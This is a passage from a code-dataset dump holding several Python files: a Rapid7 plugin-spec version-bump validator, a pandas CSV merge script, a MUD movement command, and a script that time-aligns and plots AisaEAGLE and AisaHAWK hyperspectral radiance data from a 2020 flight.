None\n for _remote in remote_list:\n if _remote.name == \"origin/master\":\n remote = _remote\n # now get the blob representing the plugin folder and loop over until we find plugin spec\n try:\n for _blob in _remote.object.tree[RepoConstants.PLUGIN_DIRNAME][plugin_name]:\n if _blob.name == RepoConstants.PLUGIN_SPEC:\n blob = _blob\n break\n except KeyError:\n # plugin name not found, so version increment is not really relevant\n return None\n if blob is None:\n # throw error: no plugin spec found in remote\n raise ValidationException(f\"{RepoConstants.PLUGIN_SPEC} not found in remote repo\")\n break\n if remote is None:\n # throw exception : origin/master not found\n raise ValidationException(\"Remote origin/master not found.'master' branch name changed, update validator\")\n return blob\n\n def validate_no_sections_removed(self, remote: dict, local: dict):\n # checks if either \"input\" or \"output\" was removed or added to a trigger or action\n # remote and local are dictionaries of an action or trigger\n if (SpecConstants.INPUT in remote) != (SpecConstants.INPUT in local):\n raise ValidationException(f\"Input section was added or removed without a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n if (SpecConstants.OUTPUT in remote) != (SpecConstants.OUTPUT in local):\n raise ValidationException(f\"Output section was added or removed without a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_all_types_exist(self, remote: dict, local: dict):\n # checks if an entire type has been removed from spec\n for type_key in remote[SpecConstants.TYPES]:\n if type_key not in local[SpecConstants.TYPES]:\n raise ValidationException(f\"Type {type_key} has been removed without a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_types_changed(self, remote: dict, local: dict):\n # verifies that types have not been changed between spec versions\n if SpecConstants.TYPES in remote and SpecConstants.TYPES in local:\n self.validate_all_types_exist(remote, local)\n for type_key, type_value in remote[SpecConstants.TYPES].items():\n for type_inner_key, type_inner_val in type_value.items():\n local_type_in = local[SpecConstants.TYPES][type_key]\n if type_inner_key not in local_type_in:\n raise ValidationException(f\"Type {type_inner_key} removed from {type_key} without a major\"\n f\" version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n if type_inner_val.get(SpecConstants.TYPE) != local_type_in[type_inner_key].get(SpecConstants.TYPE):\n raise ValidationException(f\"Type {type_inner_key} changed in type {type_key} without a major\"\n f\" version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n if type_inner_val.get(SpecConstants.REQUIRED) != local_type_in[type_inner_key].get(SpecConstants.REQUIRED):\n raise ValidationException(f\"Type {type_inner_key} changed in type {type_key} without a major\"\n f\"version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_inner_type_changes(self, remote, local):\n self.abstract_validate_no_change(remote, local, SpecConstants.INPUT, SpecConstants.TYPE)\n self.abstract_validate_no_change(remote, local, SpecConstants.OUTPUT, SpecConstants.TYPE)\n\n def validate_no_titles_changed(self, remote, local):\n self.abstract_validate_no_change(remote, local, SpecConstants.INPUT, SpecConstants.TITLE)\n self.abstract_validate_no_change(remote, local, SpecConstants.OUTPUT, SpecConstants.TITLE)\n\n def abstract_validate_no_change(self, remote: dict, local: dict, input_or_output: str, field: str):\n # meant to validate type/title inside of individual inputs/outputs\n # input_or_output is the string spec constant for either \"input\" or \"output\"\n if input_or_output in remote:\n for key, value in remote[input_or_output].items():\n if field in value and key in local[input_or_output] and field in local[input_or_output][key]:\n old_value = value[field]\n new_value = local[input_or_output][key][field]\n if old_value != new_value:\n raise ValidationException(f\"{field} has changed in {input_or_output} {key} without a major\"\n f\"version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_input_new_or_required(self, remote: dict, local: dict):\n # operates on dictionary of individual action/trigger/task\n for input_key, input_value in local[SpecConstants.INPUT].items():\n if input_value.get(SpecConstants.REQUIRED):\n if input_key not in remote[SpecConstants.INPUT] or \\\n not remote[SpecConstants.INPUT][input_key].get(SpecConstants.REQUIRED, False):\n raise ValidationException(f\"Input has been added or changed to required in {input_key} without\"\n f\" a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_output_no_longer_required(self, remote: dict, local: dict):\n # verifies that outputs have not been changed from required to optional\n # input: complete spec dictionary\n if SpecConstants.OUTPUT in remote and SpecConstants.OUTPUT in local:\n for output_key, output_vals in remote[SpecConstants.OUTPUT].items():\n if SpecConstants.REQUIRED in output_vals and \\\n SpecConstants.REQUIRED in local[SpecConstants.OUTPUT][output_key]:\n if output_vals[SpecConstants.REQUIRED]:\n # We know this output exists because this validator is called after verifying all outputs exist\n local_spec_req = local[SpecConstants.OUTPUT][output_key].get(SpecConstants.REQUIRED)\n if not local_spec_req:\n raise ValidationException(f\"Output {output_key} has been changed to not required in \"\n \"without a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_output_removed(self, remote: dict, local: dict):\n for item in remote[SpecConstants.OUTPUT]:\n if item not in local[SpecConstants.OUTPUT]:\n raise ValidationException(\"Output has been removed from an action or trigger. This requires \"\n f\"a major version increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_input_removed(self, remote: dict, local: dict):\n for item in remote[SpecConstants.INPUT]:\n if item not in local[SpecConstants.INPUT]:\n raise ValidationException(\"Input has been removed from an action or trigger. This requires \"\n f\"a major version increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_action_removed(self, remote: dict, local: dict):\n # input: complete spec dictionary\n for action in remote[SpecConstants.ACTIONS]:\n if action not in local[SpecConstants.ACTIONS]:\n raise ValidationException(f\"Action {action} has been removed from spec without major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_no_trigger_removed(self, remote: dict, local: dict):\n # input: complete spec dictionary\n for trigger in remote[SpecConstants.TRIGGERS]:\n if trigger not in local[SpecConstants.TRIGGERS]:\n raise ValidationException(f\"Trigger {trigger} has been removed from {RepoConstants.PLUGIN_SPEC} without\"\n f\" a major version increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_actions(self, remote: dict, local: dict):\n # input: complete spec dictionary\n self.validate_no_action_removed(remote, local)\n for action_key, remote_action_dict in remote[SpecConstants.ACTIONS].items():\n local_dict = local[SpecConstants.ACTIONS][action_key]\n if local_dict.get(SpecConstants.TITLE) != remote_action_dict.get(SpecConstants.TITLE):\n raise ValidationException(f\"Action {action_key} title has changed without a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n self.validate_inner_fields(remote_action_dict, local_dict)\n\n def validate_triggers(self, remote: dict, local: dict):\n # input: complete spec dictionary\n if SpecConstants.TRIGGERS in remote and SpecConstants.TRIGGERS in local:\n self.validate_no_trigger_removed(remote, local)\n for trigger_key, remote_trigger_dict in remote[SpecConstants.TRIGGERS].items():\n local_dict = local[SpecConstants.TRIGGERS][trigger_key]\n if local_dict.get(SpecConstants.TITLE) != remote_trigger_dict.get(SpecConstants.TITLE):\n raise ValidationException(f\"Trigger {trigger_key} title has changed without a major version \"\n f\"increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n self.validate_inner_fields(remote_trigger_dict, local_dict)\n\n def validate_connections(self, remote: dict, local: dict):\n # This may well be deprecated almost immediately when versioned connections is released\n # input: complete spec dictionary\n if SpecConstants.CONNECTIONS in remote:\n if SpecConstants.CONNECTIONS not in local:\n raise ValidationException(\"Connection removed without a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n for key, value in remote[SpecConstants.CONNECTIONS].items():\n if key not in local[SpecConstants.CONNECTIONS]:\n raise ValidationException(f\"{key} removed from connection without a major version increment.\"\n f\"{self.MAJOR_INSTRUCTIONS_STRING}\")\n for key, value in local[SpecConstants.CONNECTIONS].items():\n if key not in remote[SpecConstants.CONNECTIONS] and value[SpecConstants.REQUIRED]:\n raise ValidationException(f\"{key} added to connection as required input without major version\"\n f\"increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n # established the same keys/vals at this point. Check titles / types next\n for key, value in local[SpecConstants.CONNECTIONS].items():\n if key in remote[SpecConstants.CONNECTIONS]:\n curr_compare = remote[SpecConstants.CONNECTIONS][key]\n if value.get(SpecConstants.TITLE) != curr_compare.get(SpecConstants.TITLE):\n raise ValidationException(f\"Title changed in connection field {key}, requiring a major version\"\n f\" increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n if value.get(SpecConstants.TYPE) != curr_compare.get(SpecConstants.TYPE):\n raise ValidationException(f\"Type changed in connection field {key}, requiring a major version\"\n f\" increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n else:\n if SpecConstants.CONNECTIONS in local:\n raise ValidationException(f\"Connection newly added to {RepoConstants.PLUGIN_SPEC}. This requires a\"\n f\" major version increment.{self.MAJOR_INSTRUCTIONS_STRING}\")\n\n def validate_inner_fields(self, remote, local):\n self.validate_no_sections_removed(remote, local)\n if SpecConstants.INPUT in remote and SpecConstants.INPUT in local:\n self.validate_no_input_removed(remote, local)\n self.validate_no_input_new_or_required(remote, local)\n if SpecConstants.OUTPUT in remote and SpecConstants.OUTPUT in local:\n self.validate_no_output_removed(remote, local)\n self.validate_no_output_no_longer_required(remote, local)\n\n self.validate_no_titles_changed(remote, local)\n self.validate_no_inner_type_changes(remote, local)\n\n def check_major_version_increment_needed(self, remote: dict, local: dict):\n # input: complete spec dictionary\n # Checks to see if version is valid sem-ver, and if we already bumped major version\n local_version = local[\"version\"].split('.')\n remote_version = remote[\"version\"].split('.')\n if len(local_version) == 3 and len(remote_version) == 3:\n local_version = VersionBumpValidator.modify_version_array(local_version)\n remote_version = VersionBumpValidator.modify_version_array(remote_version)\n if int(local_version[0]) > int(remote_version[0]):\n if int(local_version[1]) > 0 or int(local_version[2]) > 0:\n raise ValidationException(\"Major version increment should set minor and patch versions to 0.\")\n return False\n else:\n self.MAJOR_INSTRUCTIONS_STRING = f\" Please change the plugin version to \" \\\n f\"{int(remote_version[0])+1}.0.0\"\n return True\n else:\n raise ValidationException(\"Version does not match required semver format. \"\n \"Version should be in form X.Y.Z with X, Y, and Z \"\n \"being numbers. No special characters or spaces allowed. \"\n \"Versions start at 1.0.0, see https://semver.org/ for more information.\")\n\n def check_minor_version_increment_needed(self, remote: dict, local: dict):\n # input: complete spec dictionary\n # Checks to see if version is valid sem-ver, and if we already bumped minor version\n local_version = local[\"version\"].split('.')\n remote_version = remote[\"version\"].split('.')\n if len(local_version) == 3 and len(remote_version) == 3:\n local_version = VersionBumpValidator.modify_version_array(local_version)\n remote_version = VersionBumpValidator.modify_version_array(remote_version)\n if int(local_version[1]) > int(remote_version[1]):\n if int(local_version[2]) > 0:\n raise ValidationException(\"Minor version increment should set patch version to 0 \"\n \"The resulting format should be X.Y.0\")\n return False\n else:\n self.MINOR_INSTRUCTIONS_STRING = f\" Please change the plugin version to \" \\\n f\"{int(remote_version[0])}.\" \\\n f\"{int(remote_version[1]) + 1}.0\"\n return True\n else:\n raise ValidationException(\"Version does not match required semver format. \"\n \"Version should be in form X.Y.Z with X, Y, and Z \"\n \"being numbers. No special characters or spaces allowed. \"\n \"Versions start at 1.0.0, see https://semver.org/ for more information.\")\n\n @staticmethod\n def modify_version_array(version_arr: [str]):\n if version_arr[2].find('-') >= 0:\n # if there is a '-' such as in 1.0.4-beta we want to only leave the 4 but remove the '-beta'\n version_arr[2] = version_arr[2].split('-')[0]\n return version_arr\n\n def validate_minor_triggers(self, remote, local):\n self.check_for_new(remote, local, SpecConstants.TRIGGERS)\n self.validate_minor_inputs_outputs(remote, local, SpecConstants.TRIGGERS)\n\n def validate_minor_actions(self, remote, local):\n self.check_for_new(remote, local, SpecConstants.ACTIONS)\n self.validate_minor_inputs_outputs(remote, local, SpecConstants.ACTIONS)\n\n def check_for_new(self, remote: dict, local: dict, spec_type: str):\n # remote and local are the complete spec\n if spec_type in local:\n if spec_type not in remote:\n raise ValidationException(f\"Plugin spec section {spec_type} added to {RepoConstants.PLUGIN_SPEC}.\"\n f\"{self.MINOR_INSTRUCTIONS_STRING}\")\n for key in local[spec_type]:\n if key not in remote[spec_type]:\n raise ValidationException(f\"Added {spec_type}: {key}.\"\n f\"{self.MINOR_INSTRUCTIONS_STRING}\")\n\n def validate_minor_inputs_outputs(self, remote, local, spec_type):\n # Because we passed major version bump validator, we know there are no new required inputs so any new inputs\n # ARE required. We also know that there is no removed input or output fields between the two specs\n # Here, we check for new output or new non-required input\n if spec_type in local and spec_type in remote:\n for key, value in local[spec_type].items():\n remote_val = remote[spec_type][key]\n self.check_new_inputs_outputs(remote_val, value, SpecConstants.INPUT)\n self.check_new_inputs_outputs(remote_val, value, SpecConstants.OUTPUT)\n\n def check_new_inputs_outputs(self, remote: dict, local: dict, input_output: str):\n # remote, local are dictionaries of action or trigger inputs or outputs\n if input_output in local:\n for inner_key in local[input_output]:\n if inner_key not in remote[input_output]:\n raise ValidationException(f\"New {input_output} added without incrementing minor version.\"\n f\"{self.MINOR_INSTRUCTIONS_STRING}\")\n\n def validate(self, spec):\n remote_spec = VersionBumpValidator.get_remote_spec(spec)\n # case: new plugin with no remote spec\n if remote_spec is None:\n return\n local_spec = spec.spec_dictionary()\n # perform the different sections of validation\n # Check if we already did a major version bump- if so, no need to do all this checking\n if not self.check_major_version_increment_needed(remote_spec, local_spec):\n # We already bumped the major version- skip the rest of the validation\n return\n else:\n self.validate_actions(remote_spec, local_spec)\n self.validate_triggers(remote_spec, local_spec)\n self.validate_connections(remote_spec, local_spec)\n self.validate_no_types_changed(remote_spec, local_spec)\n\n # minor version validation (NOTE: It is important that minor comes AFTER major version due to assumptions made)\n if not self.check_minor_version_increment_needed(remote_spec, local_spec):\n # already validated that no major bump was needed and we bumped minor version- skip further validation\n return\n else:\n self.validate_minor_triggers(remote_spec, local_spec)\n self.validate_minor_actions(remote_spec, local_spec)\n","repo_name":"rapid7/icon-integrations-validators","sub_path":"icon_validator/rules/plugin_validators/version_bump_validator.py","file_name":"version_bump_validator.py","file_ext":"py","file_size_in_byte":22722,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"72431525284","text":"import pandas as pd\n\nmql = pd.read_csv(\"data/olist_marketing_qualified_leads_dataset.csv\")\ncd = pd.read_csv(\"data/olist_closed_deals_dataset.csv\")\n\nmf = mql.merge(cd, on=\"mql_id\", how=\"left\")\n\nsellers = pd.read_csv(\"data/olist_sellers_dataset.csv\")\n\nmf_sellers = mf.merge(sellers, on=\"seller_id\", how=\"left\")\n\nitems = pd.read_csv(\"data/olist_order_items_dataset.csv\")\n\nmf_items = mf.merge(items, on=\"seller_id\", how=\"left\")\n\nmf_sellers.to_csv(\"data/sellers_dataset.csv\", index=False, header=True)\nmf_items.to_csv(\"data/items_dataset.csv\", index=False, header=True)\n","repo_name":"marcopeix/maca-interview","sub_path":"format_data.py","file_name":"format_data.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70764833764","text":"# Project: Akrios\n# Filename: commands/southeast.py\n#\n# Capability: player\n#\n# Command Description: Command to move a player southeast\n#\n# By: Jubelo\n\nfrom commands import *\n\nname = \"southeast\"\nversion = 1\n\n\n@Command(capability=[\"player\", \"mobile\", \"object\"])\nasync def southeast(caller, args, **kwargs):\n await Command.commandhash['move'](caller, 'southeast')\n","repo_name":"bdubyapee/akrios-ii","sub_path":"src/commands/southeast.py","file_name":"southeast.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"8790894480","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 16 12:45:20 2021\r\n\r\n@author: Lukas Monrad-Krohn (lm73code@studserv.uni-leipzig.de / lukas@monrad-krohn.com)\r\n\r\nThis python script will combine the dataarrays of AisaEAGLE and AiseHAWK to one netcdf file. Deteils\r\ncan be found in the powerpoint presentation.\r\nAround line 150 it gets really complicated. Please make sure, to understand this well. There is still the need\r\nto correct some incompatibilities manually afterwards.\r\n\"\"\"\r\n\r\n# imports\r\nfrom spectral import *\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\nimport glob\r\nimport matplotlib.dates as mdates\r\nimport pandas as pd\r\nimport netCDF4\r\nfrom netCDF4 import Dataset\r\nimport sys\r\nfrom tqdm import tqdm\r\n\r\n\r\nruntime_start = datetime.now()\r\n\r\n# organizing stuff #################################################################\r\n#Input folder\r\ninput_folder_eagle = \"/projekt_agmwend/data/MOSAiC_ACA_S/Flight_20200910a/AisaEAGLE/\"\r\ninput_folder_hawk = \"/projekt_agmwend/data/MOSAiC_ACA_S/Flight_20200910a/AisaHAWK/\"\r\n\r\n#wavelength(s)\r\nwvl1 = [640] # between 400 und 993nm\r\nwvl2 = [1200] #between 931 und 2544nm\r\nwvlx = [640, 1200]\r\n\r\n#Output folder\r\noutput_folder_lm= '/home/lmkrohn/spec_img/' #used for testing only, please use your own\r\noutput_folder= '/projekt_agmwend/data/MOSAiC_ACA_S/Flight_20200910a/AisaEAGLE_HAWK_combined/'\r\n\r\n\r\ntimes_to_plot = [5, 100, 300] # in seconds since start\r\nwvl_to_plot = [1650, 2100] # in nm\r\n\r\n# decisions\r\nrun_for_all = True\r\n\r\n\r\ncreateplot = False\r\nsaveplot = False\r\n\r\ncreate_csv = False\r\ncreate_nc = True\r\n\r\nfirst_run_of_day = True\r\nif first_run_of_day == True:\r\n ab = 'a'\r\nelse:\r\n ab = 'b'\r\n \r\n\r\n# which pixel row to calculate\r\n# center or bottom quarter or top quarter or bottom and top\r\ncenterrow = False\r\nbottomrow = True\r\ntoprow = True\r\n\r\n################################################################################\r\n# initialize plotting function\r\ndef find_nearest(array, value):\r\n array = np.asarray(array)\r\n idx = (np.abs(array - value)).argmin()\r\n return idx\r\n\r\ndef create_plots(data_arr, time_arr, wavel_arr, times, wavel, date_of_flight, time_of_flight, timeplot=True, wvlplot=True, allow_running_mean = False):\r\n \r\n # find wavelengths\r\n idx = [find_nearest(wavel_arr, i) for i in wavel]\r\n \r\n # choose times in seconds\r\n #times = [5, 100, 300]\r\n \r\n #colors for multiple plots (maximum: 5)\r\n color_ls1 = ['violet', 'darkblue', 'blue', 'lightblue', 'teal']\r\n color_ls2 = ['darkgreen', 'forestgreen', 'limegreen', 'lightgreen', 'yellow']\r\n \r\n # max 3 with running mean\r\n color_ls3 = ['yellow', 'orange', 'red']\r\n \r\n # number of steps for running mean\r\n N = 10\r\n #allow_running_mean = False\r\n \r\n \r\n # start plotting ----------------------------------------------------------\r\n fig, (ax1, ax2) = plt.subplots(2, 1, figsize = (8,11))\r\n \r\n \r\n ax1.set_title('Radiance for certain wavelengths over time')\r\n ax1.set_ylabel('Radiance $ [10^{-3}\\,W\\,m^{-2}\\,sr^{-1}\\,nm^{-1}]$')\r\n ax1.set_xlabel('time [s]')\r\n for i in range(len(idx)):\r\n ax1.plot(time_arr, data_arr[idx[i],:], color=color_ls1[i], label = 'wvl = %.1f nm' %wavel_arr[idx[i]])\r\n if allow_running_mean == True:\r\n run_mean = np.convolve(data_arr[idx[i],:], np.ones(N)/N, mode='valid')\r\n ax1.plot(time_arr[:-(N-1)], run_mean, label = 'running mean, wvl = %.1f nm' %wavel_arr[idx[i]], \r\n color = color_ls3[i], linestyle = '--')\r\n ax1.legend()\r\n \r\n ax2.set_title('Radiance for certain time over all wavelengths')\r\n ax2.set_ylabel('Radiance $ [10^{-3}\\,W\\,m^{-2}\\,sr^{-1}\\,nm^{-1}]$')\r\n ax2.set_xlabel('wavelength [nm]')\r\n for i in range(len(times)):\r\n ax2.plot(wavel_arr, data_arr[:,20*times[i]], color=color_ls2[i], label = 'time = %.1f s' %time_arr[20*times[i]])\r\n ax2.legend()\r\n \r\n if saveplot == True:\r\n plt.savefig('Flight_'+date_of_flight+'_'+time_of_flight+ '_EagleHawk_2Pixelrows_Radiances.png', dpi = 300, bbox_inches = 'tight')\r\n plt.show()\r\n \r\n \r\n#------------------------------------------------------------------------------\r\n# start calculations\r\n# running for all or just testing for a single fiel?\r\nif run_for_all == True:\r\n eagle = sorted(glob.glob(input_folder_eagle+\"*.hdr\"))\r\n hawk = sorted(glob.glob(input_folder_hawk+\"*.hdr\"))\r\n\r\nelse:\r\n list_of_files = ['/projekt_agmwend/data/MOSAiC_ACA_S/Flight_20200910a/AisaEAGLE/MOSAiC_ACA_Flight_20200910a_0910-1407_radiance.hdr', '/projekt_agmwend/data/MOSAiC_ACA_S/Flight_20200910a/AisaHAWK/MOSAiC_ACA_Flight_20200910a_0910-1407-1_radiance.hdr']\r\n\r\n # ['/projekt_agmwend/data/MOSAiC_ACA_S/Flight_20200910a/AisaEAGLE/MOSAiC_ACA_Flight_20200910a_0910-1014_radiance.hdr', '/projekt_agmwend/data/MOSAiC_ACA_S/Flight_20200910a/AisaHAWK/MOSAiC_ACA_Flight_20200910a_0910-1015-1_radiance.hdr']\r\n\r\n eagle = []\r\n hawk = []\r\n for i in range(len(list_of_files)):\r\n if list_of_files[i][-15:] == '-1_radiance.hdr':\r\n hawk.append(list_of_files[i])\r\n else:\r\n eagle.append(list_of_files[i])\r\n \r\n\r\n# process to check for irregularities\r\nprint(len(eagle))\r\nprint(len(hawk))\r\n\r\n\r\nlist_of_problems = []\r\nif len(hawk)!=len(eagle):\r\n for j in range(len(hawk)-abs(len(hawk) - len(eagle))):\r\n if hawk[j][-19:-15] != eagle[j][-17:-13]:\r\n list_of_problems.append(j)\r\n print(j)\r\n print(hawk[j][-19:-15], eagle[j][-17:-13])\r\n #print('\\n')\r\n #print(list_of_problems)\r\n\r\n# correct errors manually (first step)\r\n# if you run it and get an error this is probably the first piece to check and manually correct\r\n# it with the information printed above!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\ndel eagle[6]\r\ndel hawk[-2:]\r\n\r\nprint(len(eagle), len(hawk), 'eagle then hawk')\r\nfor i in range(len(hawk) - abs(len(hawk) - len(eagle))):\r\n print(i)\r\n print(hawk[i][-19:-15], eagle[i][-17:-13], 'hawk then eagle')\r\n\r\nif len(hawk) != len(eagle):\r\n sys.exit('ERROR: hawk and eagle still don\\'t have the same length')\r\n \r\n# now you have the final information to check, if all the eagle and hawk datasets for each part of the flight \r\n# match each other\r\n# --> start running it.\r\n\r\nllist = [0, 44]\r\nfor num in tqdm(range(len(eagle))):#44 is maxlen range(eagle) or use range([5,6]) to just do one\r\n\r\n # get data\r\n \r\n filename_1200 = hawk[num][-52:-4]\r\n filename_640 = eagle[num][-50:-4]\r\n print(filename_1200, filename_640)\r\n \r\n img_640 = open_image(eagle[num])\r\n img_1200 = open_image(hawk[num])\r\n b_640 = np.asarray(img_640.bands.centers)\r\n b_1200 = np.asarray(img_1200.bands.centers)\r\n b = [b_640, b_1200]\r\n \r\n arr_640= img_640.asarray()\r\n arr_1200= img_1200.asarray()\r\n \r\n #---------------------------------------\r\n #Get time\r\n date_640 = img_640.metadata['acquisition date'][-10:]\r\n date_640 = date_640[-4:]+\"-\"+date_640[-7:-5]+\"-\"+date_640[-10:-8]\r\n start_time_640 = img_640.metadata['gps start time'][-13:-1]\r\n \r\n date_1200 = img_1200.metadata['acquisition date'][-10:]\r\n date_1200 = date_1200[-4:]+\"-\"+date_1200[-7:-5]+\"-\"+date_1200[-10:-8]\r\n start_time_1200 = img_1200.metadata['gps start time'][-13:-1]\r\n \r\n \r\n starttime_640 = datetime.fromisoformat(date_640+\" \"+start_time_640)\r\n time_ls_640 = []\r\n for i in range(0,len(arr_640)):\r\n time_ls_640.append(starttime_640 + i* timedelta(seconds=0.05))\r\n time_640 = np.asarray(time_ls_640)\r\n \r\n starttime_1200 = datetime.fromisoformat(date_1200+\" \"+start_time_1200)\r\n time_ls_1200 = []\r\n for i in range(0,len(arr_1200)):\r\n time_ls_1200.append(starttime_1200 + i* timedelta(seconds=0.05))\r\n time_1200 = np.asarray(time_ls_1200)\r\n \r\n print(time_640[0], time_640[-1])\r\n print(time_1200[0], time_1200[-1])\r\n\r\n print(arr_640.shape, arr_1200.shape)\r\n \r\n \r\n #----------------------------------\r\n #clip data\r\n # we assume, that first Eagle is started, then Hawk and Hawk is stopped before Eagle\r\n # watch out for differences, or if it doesn't happen in the 'same' minute\r\n \r\n start_640 = time_640[0].strftime(\"%m/%d/%Y, %H:%M:%S.%f\")\r\n end_640 = time_640[-1].strftime(\"%m/%d/%Y, %H:%M:%S.%f\")\r\n start_1200 = time_1200[0].strftime(\"%m/%d/%Y, %H:%M:%S.%f\")\r\n end_1200 = time_1200[-1].strftime(\"%m/%d/%Y, %H:%M:%S.%f\")\r\n \r\n # k and z are parameters used to cut the dataarrays to the same starting and ending time\r\n k = int(np.round((float(start_640[-9:]) - float(start_1200[-9:])) / 0.05 * (-1)))\r\n \r\n z = int(np.round((float(end_640[-9:]) - float(end_1200[-9:])) / 0.05 * (-1)))\r\n \r\n #improv !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n # below are different corrections to cope with variable problems, if Eagle and Hawk started in different minutes\r\n # or they were not always started first one then the other but mixed up.\r\n # If you get an error saying, that the dimensions of the array don't fit, I choose to correct it manually,\r\n # because it was getting too complicated in the correction part below. Good Luck! The manual correction can be done with the\r\n # information from the last 3 print statements. \r\n #k = 140\r\n #z = -108\r\n\r\n \r\n\r\n print('k,z = ', k, z)\r\n\r\n k_1200 = False\r\n z_1200 = False\r\n\r\n\r\n if k < 0:\r\n if float(start_640[-9:]) < float(start_1200[-9:]):\r\n k = int(np.round((float(start_640[-9:]) - float(start_1200[-9:]) -60) / 0.05 * (-1)))\r\n k_1200 = False\r\n #arr_640 = arr_640[k:,:,:]\r\n print('k = ',k)\r\n if float(start_640[-9:]) > float(start_1200[-9:]):\r\n k = False\r\n k_1200 = int(np.round((float(start_1200[-9:]) - float(start_640[-9:])) / 0.05 * (-1)))\r\n #arr_1200 = arr_1200[k_1200:,:,:]\r\n print('k_1200 = ', k_1200)\r\n \r\n if z > 0:\r\n if float(end_640[-9:]) > float(end_1200[-9:]):\r\n z = int(np.round((float(end_640[-9:]) - float(end_1200[-9:]) +60) / 0.05 * (-1)))\r\n \r\n z_1200 = False\r\n #arr_640 = arr_640[:z,:,:]\r\n print('z = ', z)\r\n if float(end_640[-9:]) < float(end_1200[-9:]):\r\n z = False\r\n z_1200 = int(np.round((float(end_1200[-9:]) - float(end_640[-9:])) / 0.05 * (-1)))\r\n #arr_1200 = arr_1200[:z_1200,:,:]\r\n print('z_1200 = ', z_1200)\r\n\r\n if k != False:\r\n arr_640 = arr_640[k:,:,:]\r\n if z != False:\r\n arr_640 = arr_640[:z,:,:]\r\n\r\n if k_1200 != False:\r\n arr_1200 = arr_1200[k_1200:,:,:]\r\n if z_1200 != False:\r\n arr_1200 = arr_1200[:z_1200,:,:]\r\n\r\n #to correct mistakes at rounding off:\r\n\r\n dim640 = arr_640.shape\r\n dim1200 = arr_1200.shape\r\n print(dim640, dim1200)\r\n\r\n if dim640[0] < dim1200[0]:\r\n arr_1200 = arr_1200[:-1,:,:]\r\n if dim640[0] > dim1200[0]:\r\n arr_640 = arr_640[:-1,:,:]\r\n \r\n #arr_640 = arr_640[k:z,:,:]\r\n \r\n # does not work if the succession is wrong and die difference is across the minute\r\n # watch out for problems here !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n \r\n #-------------------------------------\r\n #get time_arr\r\n starttime = datetime.fromisoformat(date_1200+\" \"+start_time_1200)\r\n print(starttime)\r\n \r\n time_ls = []\r\n time_ls_old = []\r\n \r\n for i in range(0,len(arr_1200)):\r\n time_ls.append(starttime + i* timedelta(seconds=0.05))\r\n time_arr = np.asarray(time_ls)\r\n\r\n\r\n for i in range(0,len(arr_640)):\r\n time_ls_old.append(datetime.fromisoformat(date_640+' '+start_time_640) + (k+i) * timedelta(seconds=0.5))\r\n time_arr_old = np.asarray(time_ls_old)\r\n\r\n time_delta = [i.timestamp() for i in time_arr[:]]\r\n time_delta_old = [i.timestamp() for i in time_arr_old[:]]\r\n \r\n \r\n print('time calcing finished')\r\n #-------------------------------------\r\n #sort data\r\n col_name_ls = ['time']\r\n b2 = np.concatenate([b_640, b_1200[11:]])\r\n \r\n for i in range(len(b2)):\r\n col_name_ls.append(str(b2[i]))\r\n \r\n #--------------------------------------\r\n '''\r\n for centerpixels use 183:201 for 1200 and 488:536 for 640\r\n \r\n for 1/4 pixels use 87:105 for 1200 and 232:280 for 640\r\n \r\n for 3/4 pixels use 279:297 for 1200 and 744:792 fro 640\r\n '''\r\n\r\n \r\n def interpolate(arr, new_time=time_delta, old_time=time_delta_old):\r\n for i in range(len(arr[0,:])):\r\n arr[:,i] = np.interp(new_time, old_time, arr[:,i])\r\n\r\n return arr\r\n \r\n \r\n # center \r\n if centerrow == True:\r\n center_arr_1200 = [[0 for _ in range(len(b_1200[11:]))] for _ in range(len(arr_1200))]\r\n for j in range(len(b_1200[11:])): # wavelength\r\n for i in range(len(arr_1200)): # timesteps\r\n center_arr_1200[i][j] = np.mean(arr_1200[i, 183:201, 11+j])\r\n center_arr_1200 = np.asarray(center_arr_1200)\r\n \r\n \r\n center_arr_640 = [[0 for _ in range(len(b_640))] for _ in range(len(arr_640))]\r\n for j in range(len(b_640)): # wavelength\r\n for i in range(len(arr_640)): # timesteps\r\n center_arr_640[i][j] = np.mean(arr_640[i, 488:536, j])\r\n center_arr_640 = np.asarray(center_arr_640)\r\n\r\n center_arr_640 = interpolate(center_arr_640)\r\n print(center_arr_640.shape)\r\n \r\n print('center calcing finished')\r\n \r\n # botton quarter\r\n if bottomrow == 